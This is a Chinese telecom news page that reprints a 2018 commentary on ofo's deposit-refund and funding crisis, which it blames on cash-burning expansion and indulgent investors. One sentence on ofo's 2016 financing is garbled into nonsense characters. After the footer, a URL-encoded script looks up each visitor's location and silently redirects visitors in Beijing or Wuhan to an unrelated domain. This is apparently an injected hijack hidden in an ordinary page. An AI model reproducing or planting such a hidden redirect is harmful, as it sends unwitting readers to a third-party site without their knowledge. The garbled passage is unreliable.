首页 | 滚动 | 国内 | 国际 | 运营 | 制造 | 终端 | 监管 | 原创 | 业务 | 技术 | 报告 | 博客 | 特约记者
手机 | 互联网 | IT | 5G | 光通信 | LTE | 云计算 | 三网融合 | 芯片 | 电源 | 虚拟运营商 | 测试 | 移动互联网 | 会展
首页 >> 快讯 >> 正文

从“风口”到“浪尖”,ofo窘境背后的资本推手

2018年12月24日 07:56  中国证券报  

小黄车ofo和共享单车再次走上风口浪尖。不过,这次扑面而来的不再是共享经济“明星”的无限风光,而是拥挤的退押金的漫漫长队和随之而来的信任与资金危机,还有戴威的“限制消费令”和诉讼缠身。与此同时,老对手摩拜创始人胡玮炜也黯然离去。

其兴也勃焉,其亡也忽焉。从集资本万千宠爱的明星创业公司,到今天陷入资金链危机四面楚歌,ofo只用了三年多的时间,依靠疯狂“烧钱”吹起的泡沫终于破裂,在目前的资本“寒冬”中散发着彻骨的寒意。何以至此?毫无疑问,创业者膨胀自大等种种失误肯定是重要原因,但背后互联网时代资本的“纵容”和裹挟也是重要推手。

实际上,共享单车能一度成为资本竞相追逐的“风口”,并非偶然。首先,其对准的是一公里之内出行的“痛点”,有部分真正的市场需求支撑;其次,共享单车有共享环保的美好愿景;最后,线上流量红利日益枯竭,共享经济能开辟新的线下流量入口,在“先抢市场、拼流量,再考虑如何变现”的所谓互联网思维风行之际,“烧钱换用户”的互联网商业故事可以开讲;此外,还有押金池海量的资金沉淀,如此种种,当然不乏吸引力。不过,在盈利模式尚是一团迷雾之际,共享单车却以迅雷不及掩耳之势成为了最炙手可热的明星项目,速度之快,令人瞠目:2016年10月,ofo进军城市市。潭碳父鲈戮途5轮融资,累计融资金额超过2亿美元。2017年,共享单车和资本更是一路狂奔,似乎只要入局就有资本接盘,无止境的融资、烧钱、补贴、扩张,甚至烧到海外市场……当时笔者曾与投资机构进行交流,得到的理由是“对于大家暂时还看不清的新事物,当前是否盈利并不见得很重要,这时抢占赛道最重要。”

过量资本的追捧和涌入,使得共享单车企业不必再考虑如何控制成本精细化运营,只要不停投放、补贴、圈用户、扩市场、逼对手,简单粗暴“烧钱”就会有源源不断的资本进来,这无疑为如今的危机埋下了隐患。而初创公司的粗放管理,股东之间“相互否决”的剧烈博弈,则将他们推向了深渊……ofo等共享单车的结局再次表明,纯粹依靠资本融资“烧钱”,靠编故事圈钱圈地,而没有脚踏实地的经营,始终是无法长久的。创业需要回归商业本质,尊重商业规律,即使是新的经济形态,也需要有良性持久的盈利模式。而投资也要回归理性和谨慎,笃信“在风口猪都能起飞”,早晚会在风停时摔下来。

编 辑:值班记者
免责声明:刊载本文目的在于传播更多行业信息,不代表本站对读者构成任何其它建议,请读者仅作参考,更不能作为投资使用依据,请自行核实相关内容。
相关新闻              
 
人物
2018年9月15日,中国电信董事长杨杰在2018世界物联网博览会无..
精彩专题
中国信科首秀2018中国国际信息通信展
中国电信绽放2018国际通信展
聚焦2018年中国国际信息通信展
遇见美好未来--世界移动大会·上海
CCTIME推荐
关于我们 | 广告报价 | 联系我们 | 隐私声明 | 本站地图
CCTIME飞象网 CopyRight © 2007-2017 By CCTIME.COM
京ICP备08004280号  电信与信息服务业务经营许可证080234号 京公网安备110105000771号
公司名称: 北京飞象互动文化传媒有限公司
未经书面许可,禁止转载、摘编、复制、镜像

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%u5317%u4EAC%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%u6B66%u6C49%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E